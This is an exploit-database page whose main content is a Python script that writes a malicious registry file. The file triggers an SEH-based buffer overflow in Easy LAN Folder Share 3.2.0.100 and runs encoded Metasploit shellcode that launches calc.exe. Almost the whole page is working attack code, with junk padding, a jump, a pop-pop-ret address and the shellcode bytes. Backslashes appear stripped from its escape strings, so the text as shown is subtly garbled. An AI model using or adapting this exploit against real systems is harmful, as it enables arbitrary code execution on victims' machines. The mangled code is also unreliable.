[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Easy LAN Folder Share Version 3.2.0.100 - Buffer Overflow Exploit (SEH)
# Published : 2013-08-03
# Author :
# Previous Title : aSc Timetables 2013 - Stack Buffer Overflow Vulnerability
# Next Title : Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities


#!/usr/bin/python

# ==========================================================================================
# Exploit Title: Easy LAN Folder Share Version 3.2.0.100 Buffer Overflow vulnerability (SEH)
# Date: 2013-08-03
# Exploit Author: sagi-
# Original Bug Found By: ariarat
# Vendor Homepage: http://www.mostgear.com
# Software Link: http://download.cnet.com/Easy-LAN-Folder-Share/3000-2085_4-10909166.html
# Version: 3.2.0.100
# Tested On: Windows XP Professional SP2 & SP3 (ENG)
# ==========================================================================================
# The registration code field in the 'activate license' window is vulnerable to a buffer overflow. 
# This script generates a malicious registry file. 
# Once the generated file has been loaded into the registry, execute the application as normal.
# ==========================================================================================
# Greetz: corelanc0d3r, g0tmi1k
# ==========================================================================================

header  = "Windows Registry Editor Version 5.00nn"
header += "[HKEY_LOCAL_MACHINESOFTWAREMostGearEasyLanFolderShare_V1License]n"
header += ""BeginDate"="8/2/2013"n"
header += ""ExpireDate"="8/17/2013"n"
header += ""UserName"="a"n"
header += ""Serial"=""

junk = "x41" * 550
nseh = "xEBx27x90x90" # jmp short 0x29
seh  = "xEFx03xFCx7F" # pop pop ret
padding = "x90" * 33     # Required as some random characters appear on the stack

#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_upper -t c
#[*] x86/alpha_upper succeeded with size 469 (iteration=1)
shellcode = (
"x89xe2xd9xf6xd9x72xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx5ax48x4bx39x33x30"
"x43x30x53x30x35x30x4cx49x4bx55x46x51x38x52x43"
"x54x4cx4bx30x52x56x50x4cx4bx36x32x44x4cx4cx4b"
"x36x32x54x54x4cx4bx33x42x47x58x54x4fx4fx47x50"
"x4ax46x46x56x51x4bx4fx36x51x59x50x4ex4cx37x4c"
"x55x31x43x4cx43x32x36x4cx51x30x49x51x48x4fx34"
"x4dx43x31x48x47x4ax42x4ax50x36x32x50x57x4cx4b"
"x50x52x44x50x4cx4bx47x32x37x4cx43x31x48x50x4c"
"x4bx57x30x44x38x4cx45x59x50x44x34x31x5ax53x31"
"x4ex30x50x50x4cx4bx50x48x32x38x4cx4bx36x38x37"
"x50x55x51x48x53x4ax43x47x4cx47x39x4cx4bx50x34"
"x4cx4bx35x51x48x56x46x51x4bx4fx56x51x59x50x4e"
"x4cx39x51x58x4fx44x4dx35x51x49x57x50x38x4dx30"
"x34x35x4cx34x35x53x43x4dx4cx38x37x4bx33x4dx46"
"x44x44x35x4ax42x51x48x4cx4bx56x38x36x44x43x31"
"x39x43x33x56x4cx4bx44x4cx30x4bx4cx4bx30x58x45"
"x4cx35x51x4ex33x4cx4bx33x34x4cx4bx55x51x4ex30"
"x4dx59x57x34x46x44x47x54x51x4bx31x4bx53x51x46"
"x39x50x5ax56x31x4bx4fx4dx30x31x48x51x4fx30x5a"
"x4cx4bx32x32x4ax4bx4cx46x51x4dx42x4ax53x31x4c"
"x4dx4cx45x58x39x55x50x43x30x45x50x30x50x42x48"
"x56x51x4cx4bx52x4fx4dx57x4bx4fx48x55x4fx4bx4b"
"x4ex44x4ex36x52x4ax4ax43x58x39x36x4dx45x4fx4d"
"x4dx4dx4bx4fx4ex35x57x4cx55x56x53x4cx34x4ax4d"
"x50x4bx4bx4dx30x32x55x33x35x4fx4bx51x57x52x33"
"x32x52x32x4fx32x4ax43x30x31x43x4bx4fx39x45x35"
"x33x45x31x42x4cx35x33x46x4ex42x45x33x48x42x45"
"x33x30x41x41"
)

trailer = "x90" * (2000 - len(junk + nseh + seh + padding + shellcode)) + ""nn"
buffer = header + junk + nseh + seh + padding + shellcode + trailer

textfile = open("exploit.reg" , 'w')
textfile.write(buffer)
textfile.close()

print "[*] Done"